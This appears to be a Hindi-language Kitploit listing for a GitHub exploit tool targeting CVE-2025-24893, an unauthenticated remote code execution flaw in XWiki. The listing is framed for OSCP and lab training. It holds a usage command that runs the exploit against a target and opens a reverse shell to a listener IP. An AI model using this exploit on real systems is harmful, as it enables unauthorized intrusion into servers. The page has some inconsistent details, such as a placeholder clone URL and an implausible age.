Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24893 — OSCP जैसा CVE-2025-24893 एक्सप्लॉइट Linux XWiki के लिए | Kitploit
उपकरण/GitHubGitHub/vasilysaint/cve-2025-24893
शोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूललैब और अभ्यास
GitHubvasilysaint/cve-2025-24893

CVE-2025-24893

OSCP जैसा CVE-2025-24893 एक्सप्लॉइट Linux XWiki के लिए

रिपॉजिटरी देखें
123 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24893

XWiki Platform एक सामान्य विकि प्लेटफ़ॉर्म है जो इसके ऊपर बनाए गए अनुप्रयोगों के लिए रनटाइम सेवाएँ प्रदान करता है। SolrSearch एंडपॉइंट में एक कमज़ोरी के कारण, एक अप्रमाणित उपयोगकर्ता मनमाना दूरस्थ कोड निष्पादन प्राप्त कर सकता है। यह कमज़ोरी संपूर्ण XWiki इंस्टॉलेशन की गोपनीयता, अखंडता और उपलब्धता को प्रभावित करती है।

CVE: CVE-2025-24893


डेमो

एक्सप्लॉइट का प्रदर्शन नीचे दिखाया गया है:

Terminal Demo

उपयोग

इस एक्सप्लॉइट का उपयोग करने के लिए, इन चरणों का पालन करें:

  1. रिपॉजिटरी को क्लोन करें: git clone https://github.com/yourusername/CVE-2025-24893.git
  2. क्लोन की गई निर्देशिका पर जाएँ: cd CVE-2025-24893
  3. आवश्यक निर्भरताएँ स्थापित करें: pip install requests
  4. एक्सप्लॉइट चलाएँ:
root@kitploit:~
./CVE-2025-24893_linux-xwiki-exploit.py  -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]

इस एक्सप्लॉइट के बारे में

यह एक्सप्लॉइट CVE-2025-24893 में वर्णित दूरस्थ कोड निष्पादन कमज़ोरी को प्रदर्शित करता है और एक अप्रमाणित उपयोगकर्ता को कमज़ोर Linux-आधारित XWiki इंस्टॉलेशन पर एक रिवर्स शेल प्राप्त करने की अनुमति देता है।

मैंने मूल रूप से इस उपकरण को प्रशिक्षण वातावरणों जैसे OSCP तैयारी प्रयोगशालाओं और Hack The Box में उपयोग के लिए विकसित किया था, जहाँ मैं कमज़ोरी को पुन: उत्पन्न करने का एक सरल और विश्वसनीय तरीका चाहता था। चूँकि कोई मौजूदा उपकरण मेरी आवश्यकताओं को पूरा नहीं करता था, मैंने एक बनाने का निर्णय लिया।

हालाँकि CVE-2025-24893 को समर्थित XWiki रिलीज़ में बहुत पहले पैच कर दिया गया है, इस एक्सप्लॉइट का उपयोग केवल उन सिस्टमों के विरुद्ध किया जाना चाहिए जिनके आप मालिक हैं या जिनका परीक्षण करने के लिए आप स्पष्ट रूप से अधिकृत हैं।

लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या इसके उपयोग से होने वाली किसी भी क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा मूल्यांकनों के लिए है।

इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके आप मालिक हैं या जिनका परीक्षण करने के लिए आप स्पष्ट रूप से अधिकृत हैं। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या इसके उपयोग से होने वाली किसी भी क्षति के लिए कोई दायित्व नहीं मानता है।

योगदान

योगदान का स्वागत है।

यदि आप बग का सामना करते हैं, सुधार के लिए सुझाव हैं, या अतिरिक्त पेलोड, प्लेटफ़ॉर्म या सुविधाओं के लिए समर्थन जोड़ना चाहते हैं, तो बेझिझक एक इश्यू खोलें या पुल रिक्वेस्ट सबमिट करें।

रचनात्मक प्रतिक्रिया, परीक्षण रिपोर्ट और कोड योगदान की बहुत सराहना की जाती है।

टूल डाउनलोड करें